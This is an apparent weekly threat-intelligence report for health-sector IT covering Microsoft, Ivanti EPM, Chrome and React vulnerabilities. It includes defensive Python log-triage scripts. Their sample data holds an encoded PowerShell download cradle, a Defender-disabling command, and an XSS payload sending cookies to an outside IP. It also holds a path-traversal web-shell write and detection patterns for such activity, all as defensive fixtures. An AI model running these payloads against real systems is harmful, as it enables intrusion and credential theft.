
15.12.25 Threat Report

This week’s report: fresh exploits and old flaws re-weaponised. Microsoft, Chrome and React all shipped security fixes, and endpoint management platforms remain a high-value route into estates. If you manage clinical endpoints, patient-facing web apps or enterprise admin tooling, this is a week to prioritise updates and tighten monitoring.

Microsoft December 2025 security updates

NHS England flagged Microsoft’s scheduled December updates, which address 57 vulnerabilities across Microsoft products. One is under active exploitation (CVE-2025-62221, an elevation of privilege in the Windows Cloud Files Mini Filter Driver), and two were publicly disclosed before the fix shipped: remote code execution in GitHub Copilot for JetBrains (CVE-2025-64671) and remote code execution in PowerShell (CVE-2025-54100). Elevation of privilege is usually a post-access step rather than an entry point, but it materially increases blast radius: a low-privileged foothold gained through phishing or a malicious document becomes SYSTEM-level control of the host, and from there credential theft and lateral movement. NHS CSOC assesses future exploitation as likely, so treat this as a rapid patch priority across servers and endpoints, especially where clinical access and shared devices increase impact.

Why it matters:
Windows estates underpin clinical operations, from shared workstations to back-office services. Exploited privilege-escalation bugs shorten the time from “one compromised user” to “estate-wide impact,” which is exactly how ransomware and data theft accelerate in healthcare environments.

Recommendations:

  • Apply Microsoft’s December updates as soon as possible, prioritising privileged tiers and shared clinical endpoints.

  • Review PowerShell controls (ASR rules, Constrained Language Mode where appropriate), confirm script block logging is enabled so that script content is recorded in the PowerShell Operational log (Event ID 4104), and monitor for unusual script execution post-patch, since an exploited privilege-escalation bug is typically chained with a script-based loader.

  • Validate EDR coverage and logging on endpoints used for EPR, PACS and admin access.
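
The "monitor for unusual script execution" step above is easier to act on with a concrete triage pass over exported script block events. The following is an added example, not code from the original report or from Microsoft: it takes Event ID 4104 records in a one-JSON-object-per-line export (the field names and all sample events are constructed here), decodes any -EncodedCommand payload (base64 of UTF-16LE text) so indicators hidden inside it are matched too, and returns only the records worth a human look. Expect benign hits from legitimate admin tooling; baseline per host and user before wiring this to an alert.

```python
"""Triage exported PowerShell script-block events (Event ID 4104).

Added example, not from the original report. The events are constructed
here in the one-JSON-object-per-line shape you might export from
Microsoft-Windows-PowerShell/Operational (Get-WinEvent, or a SIEM).
"""
import base64
import json
import re

# Indicators commonly seen in script blocks that fetch or launch a second stage.
SUSPICIOUS = [
    (r"\bIEX\b|Invoke-Expression", "invoke-expression"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", "download cradle"),
    (r"FromBase64String", "inline base64 decode"),
    (r"-nop\b|-NoProfile|-w(?:indowstyle)?\s+hidden|-ExecutionPolicy\s+Bypass", "evasion flags"),
    (r"Set-MpPreference|DisableRealtimeMonitoring", "defender tampering"),
]
# -EncodedCommand (and its short forms) takes base64 of the UTF-16LE command text.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_command(text: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_commands(script: str) -> list[str]:
    """Return the plaintext of every -EncodedCommand payload found in a script block."""
    decoded = []
    for m in ENCODED_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable>")
    return decoded


def triage_event(event: dict) -> dict:
    """Score one 4104 event: match indicators on the raw text AND the decoded payloads."""
    script = event.get("ScriptBlockText", "")
    decoded = decode_encoded_commands(script)
    haystack = "\n".join([script, *decoded])
    reasons = ["encoded command"] if decoded else []
    reasons += [label for pattern, label in SUSPICIOUS if re.search(pattern, haystack, re.IGNORECASE)]
    return {"RecordId": event.get("RecordId"), "Host": event.get("Host"),
            "User": event.get("User"), "reasons": reasons, "decoded": decoded}


def triage(lines) -> list[dict]:
    """Filter an export (iterable of JSON lines) down to the 4104 events that matched something."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("Id") != 4104:
            continue
        result = triage_event(event)
        if result["reasons"]:
            hits.append(result)
    return hits


# Constructed sample export (not real telemetry). Record 102 carries an encoded
# download cradle of the kind that follows a successful foothold.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
SAMPLE_EXPORT = [
    json.dumps({"RecordId": 101, "Id": 4104, "Host": "WS-CLIN-01", "User": "NHS\\nurse.a",
                "ScriptBlockText": "Get-ChildItem C:\\Users\\Public\\Reports"}),
    json.dumps({"RecordId": 102, "Id": 4104, "Host": "WS-CLIN-01", "User": "NHS\\nurse.a",
                "ScriptBlockText": "powershell -nop -w hidden -EncodedCommand " + encode_command(PAYLOAD)}),
    json.dumps({"RecordId": 103, "Id": 4104, "Host": "WS-CLIN-01", "User": "NT AUTHORITY\\SYSTEM",
                "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"}),
    json.dumps({"RecordId": 104, "Id": 4103, "Host": "WS-CLIN-01", "User": "NHS\\nurse.a",
                "ScriptBlockText": "Invoke-Expression 'ignored: not a 4104 record'"}),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EXPORT):
        print(f"{hit['Host']} {hit['User']} record {hit['RecordId']}: {', '.join(hit['reasons'])}")
        for text in hit["decoded"]:
            print("   decoded:", text)
```

Matching on the decoded text is the point: the raw event for record 102 contains only a base64 blob and two command-line flags, and the download cradle is invisible until the UTF-16LE payload is recovered.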

Ivanti Endpoint Manager vulnerabilities (pre-2024 SU4) with proof-of-concept available

NHS England issued an alert covering one critical and three high-severity issues in Ivanti Endpoint Manager (EPM), affecting versions prior to 2024 SU4. The alert notes a published proof-of-concept exploit for CVE-2025-10573 (stored XSS, CVSS 9.6) and highlights that multiple bugs could be chained to reach remote code execution in the context of an administrator session; stored XSS makes that practical because the payload waits inside the console until an administrator views the affected page. NHS CSOC assesses future exploitation as likely. Endpoint management platforms are especially sensitive: they sit close to software distribution and device control, so even where exploitation needs a step of user or admin interaction, the upside for attackers makes this class of vulnerability a frequent target.

Why it matters:
Health organisations depend on endpoint tooling for patching and device operations. If EPM is compromised, attackers can push malicious changes, harvest credentials, and accelerate ransomware deployment across clinical endpoints—turning a single weakness into a broad operational incident.

Recommendations:

  • Upgrade Ivanti EPM to the fixed build referenced in vendor guidance (2024 SU4 SR1).

  • Restrict administrative access to EPM consoles (VPN/jump host, IP allow-lists) and enforce MFA on admin accounts.

  • Review admin-session activity and web logs for unusual requests consistent with XSS or file-write abuse: script tags or event-handler attributes in submitted fields (including percent-encoded and double-encoded forms), path-traversal sequences in upload or file parameters, and console requests from addresses outside the administrative allow-list.
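
As an added example of the log review above (not the alert’s or Ivanti’s tooling): EPM runs on IIS, so the script below parses W3C-format log lines using the #Fields directive, percent-decodes each request until it is stable (so a double-encoded payload is seen as what the server will eventually see), and flags traversal sequences, XSS fragments, POST/PUT requests that reference a server-executable file, and console hits from outside an admin allow-list. The console path prefix, the allow-listed network and every log line are constructed placeholders; substitute your own.

```python
"""Review IIS W3C logs from an endpoint-management console for XSS and
file-write indicators. Added example, not part of the original alert and
not Ivanti's tooling: the console paths, allow-list and log lines below are
constructed placeholders; point it at your real logs and adjust the constants.
"""
import re
from urllib.parse import unquote

ADMIN_PREFIXES = ("/console/",)      # hypothetical admin console path(s)
ADMIN_SOURCE_NETS = ("10.50.1.",)    # hypothetical jump-host / VPN range allowed to reach the console
SERVER_EXEC_EXTS = (".aspx", ".ashx", ".asp", ".ps1", ".exe", ".dll")

XSS_PATTERNS = [r"<\s*script", r"\bon\w+\s*=", r"javascript\s*:", r"<\s*(?:img|svg|iframe)\b"]
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def full_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable: double encoding (%253C -> %3C -> <) is a common filter bypass."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_w3c(text: str):
    """Yield one dict per request, using the #Fields directive so any field order works."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            # IIS writes spaces inside a field as '+', so whitespace splitting is safe here.
            yield dict(zip(fields, line.split()))


def assess(rec: dict) -> dict:
    """Attach reasons to one request; an empty list means nothing stood out."""
    stem = full_decode(rec.get("cs-uri-stem", ""))
    query = full_decode(rec.get("cs-uri-query", "-"))
    target = f"{stem}?{query}"
    method = rec.get("cs-method", "").upper()
    source = rec.get("c-ip", "")
    reasons = []
    if TRAVERSAL_RE.search(target):
        reasons.append("path traversal")
    if any(re.search(p, target, re.IGNORECASE) for p in XSS_PATTERNS):
        reasons.append("xss payload")
    if method in ("POST", "PUT") and any(ext in query.lower() for ext in SERVER_EXEC_EXTS):
        reasons.append("file-write attempt")
    if stem.startswith(ADMIN_PREFIXES) and not source.startswith(ADMIN_SOURCE_NETS):
        reasons.append("console request from outside the admin allow-list")
    return {"time": f"{rec.get('date')} {rec.get('time')}", "source": source, "method": method,
            "user": rec.get("cs-username"), "target": target, "reasons": reasons}


def review_log(text: str) -> list[dict]:
    """Every request that raised at least one reason, in log order."""
    return [r for r in (assess(rec) for rec in parse_w3c(text)) if r["reasons"]]


# Constructed sample log (not from a real system). Lines 2 and 3 are the ones to catch:
# a stored-XSS attempt in a form field, and a double-encoded traversal aimed at writing an .aspx file.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-12-12 09:14:02 10.50.0.10 GET /console/devices.aspx page=2 443 NHS\epmadmin 10.50.1.21 Mozilla/5.0+(Windows+NT+10.0) 200
2025-12-12 09:15:40 10.50.0.10 POST /console/devices.aspx name=%3Cscript%3Efetch(%27http%3A%2F%2F203.0.113.9%2F%27%2Bdocument.cookie)%3C%2Fscript%3E 443 - 203.0.113.9 curl/8.4.0 302
2025-12-12 09:16:05 10.50.0.10 PUT /console/upload.ashx path=..%255C..%255Cinetpub%255Cwwwroot%255Ccmd.aspx 443 - 203.0.113.9 python-requests/2.31 200
2025-12-12 09:20:11 10.50.0.10 GET /console/reports.aspx id=17 443 NHS\epmadmin 10.50.1.21 Mozilla/5.0+(Windows+NT+10.0) 200
"""

if __name__ == "__main__":
    for r in review_log(SAMPLE_LOG):
        print(f"{r['time']} {r['source']} {r['method']} {r['target']}\n   -> {', '.join(r['reasons'])}")
```

The third line only reveals the backslash traversal after two rounds of decoding (%255C to %5C to \), which is why the decoder loops rather than calling unquote once.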

Google Chrome security update fixes an exploited vulnerability (Chrome Issue 466192044)

NHS England highlighted Google’s Chrome stable-channel update addressing one high-severity vulnerability with an exploit in the wild, tracked as Chrome Issue ID 466192044. The advisory also lists two medium-severity CVEs: CVE-2025-14372 (use-after-free in Password Manager) and CVE-2025-14373 (inappropriate implementation in Toolbar). Google typically withholds full details until most users have patched, which means attackers often race defenders during the early update window. In healthcare, browsers are frontline software: staff use them for portals, cloud services, email and sometimes clinical tooling. Treat exploited Chrome updates as urgent, even when details are limited at first.

Why it matters:
Browsers are where phishing, credential theft and “one-click” compromises begin. An exploited Chrome bug can become the first step to stolen credentials, hijacked sessions and downstream access to sensitive systems—especially on shared or time-pressured clinical workstations.

Recommendations:

  • Update Chrome to the latest stable version across Windows/macOS/Linux and confirm fleet compliance. Chrome downloads updates in the background but only applies them when the browser is relaunched, so check the running version (chrome://version, or your management reporting) rather than assuming an installed package is active, and prompt or force a relaunch on long-running shared workstations (the RelaunchNotification policy does this for managed browsers).

  • Tighten extension controls (approved list, block sideloading) and consider browser isolation for high-risk workflows.

  • Monitor for unusual sign-ins to clinical SaaS after rollouts (credential replay can spike during exploit waves).

React Server Components security updates (DoS and source code exposure)

NHS England issued an alert for three vulnerabilities in React Server Components affecting the server DOM packages (react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack). Two are denial-of-service issues (CVE-2025-55184 and CVE-2025-67779) and one is a source code exposure flaw (CVE-2025-55183). The alert notes that the initial fix for CVE-2025-55184 was incomplete and that a complete fix has now been issued under CVE-2025-67779, meaning teams that already patched may still be vulnerable and need to upgrade again. DoS flaws can take patient-facing services offline, and source exposure can leak server-side logic that helps attackers find further weaknesses. For platforms built on React or Next.js-style stacks, this is a strong patch priority.

Why it matters:
Patient portals, booking services and clinician dashboards are often built on modern JavaScript frameworks. A DoS condition can knock services offline during peak demand, and source code exposure can reveal sensitive server-side logic—raising the risk of follow-on exploitation and data access.

Recommendations:

  • Upgrade the React Server Components packages to the patched versions referenced in vendor guidance, and re-check environments previously updated for CVE-2025-55184 against the new minimums. Check the lockfile, not only package.json: a nested or transitively pinned copy of the package can remain at the old version after the top-level dependency is bumped.

  • Add rate limiting and request anomaly detection on server function endpoints to reduce DoS risk.

  • Review incident runbooks for rapid rollback/feature flags on patient-facing web services.
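
Two recommendations in this report come down to the same check, "is every installed copy at or above the fixed version": confirming Chrome fleet compliance after the stable-channel update, and re-checking React Server Components trees after the second fix. The block below is an added example serving both, not the report’s or either vendor’s tooling. It compares versions numerically per component (a plain string compare gets four-part Chrome versions wrong), then applies that to a constructed fleet inventory and to a constructed package-lock.json, where it also walks nested node_modules copies. The baseline and minimum version numbers are placeholders, not the real fixed builds; take those from the Google and React advisories.

```python
"""Minimum-version compliance for two of this report's checks: Chrome across a
fleet, and React Server Components packages in a lockfile. Added example, not
the report's own tooling. Version strings, hostnames and the lockfile below are
constructed; the baseline/minimum numbers are PLACEHOLDERS to replace with the
versions named in Google's and React's advisories.
"""
import json
import re


def parse_version(v: str) -> tuple:
    """'143.0.7499.109' -> (143, 0, 7499, 109). Drops pre-release tags ('19.2.0-canary-...')."""
    return tuple(int(p) for p in re.findall(r"\d+", v.split("-", 1)[0]))


def is_at_least(installed: str, minimum: str) -> bool:
    """Numeric, per-component comparison. A string compare gets this wrong:
    '100.0.1000.9' > '100.0.1000.50' lexically, but 9 < 50."""
    a, b = parse_version(installed), parse_version(minimum)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) >= b + (0,) * (width - len(b))


def chrome_noncompliant(inventory: dict, baseline: str) -> list:
    """Hosts whose reported (running) Chrome version is below the baseline."""
    return sorted(host for host, version in inventory.items() if not is_at_least(version, baseline))


def rsc_packages_below(lock_json: str, minimums: dict) -> list:
    """Walk a lockfileVersion 2/3 package-lock and report every copy of a watched package
    below its fixed version, including nested copies under other packages' node_modules,
    which is how a tree stays vulnerable after the top-level dependency was bumped."""
    lock = json.loads(lock_json)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        name = path.rsplit("node_modules/", 1)[-1]   # handles nesting and @scoped names
        if name in minimums and not is_at_least(meta.get("version", "0"), minimums[name]):
            findings.append((path, meta["version"], minimums[name]))
    return findings


CHROME_BASELINE = "100.0.1000.50"   # PLACEHOLDER, not the real fixed build
SAMPLE_INVENTORY = {                # constructed fleet report: hostname -> running version
    "WS-CLIN-01": "100.0.1000.50",
    "WS-CLIN-02": "100.0.1000.9",   # a string compare would wrongly call this compliant
    "WS-ADMIN-01": "101.0.1010.0",
    "WS-RECEP-03": "99.0.990.120",
}
RSC_MINIMUMS = {                    # PLACEHOLDER versions, not the numbers from the React advisory
    "react-server-dom-webpack": "19.9.5",
    "react-server-dom-parcel": "19.9.5",
    "react-server-dom-turbopack": "19.9.5",
}
SAMPLE_LOCK = json.dumps({          # constructed package-lock.json (lockfileVersion 3)
    "name": "patient-portal", "lockfileVersion": 3,
    "packages": {
        "": {"name": "patient-portal"},
        "node_modules/react": {"version": "19.9.5"},
        "node_modules/react-server-dom-webpack": {"version": "19.9.5"},
        "node_modules/some-framework": {"version": "16.0.0"},
        "node_modules/some-framework/node_modules/react-server-dom-webpack": {"version": "19.9.0"},
    },
})

if __name__ == "__main__":
    print("Chrome below baseline:", chrome_noncompliant(SAMPLE_INVENTORY, CHROME_BASELINE))
    for path, have, need in rsc_packages_below(SAMPLE_LOCK, RSC_MINIMUMS):
        print(f"{path}: {have} < {need}")
```

In the sample lockfile the top-level react-server-dom-webpack is already at the placeholder minimum, and only the nested copy under some-framework is reported; that nested copy is exactly what a package.json-only check misses.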

Visit www.periculo.co.uk to learn how Periculo’s Threat Intelligence service keeps you up to date with the latest threats.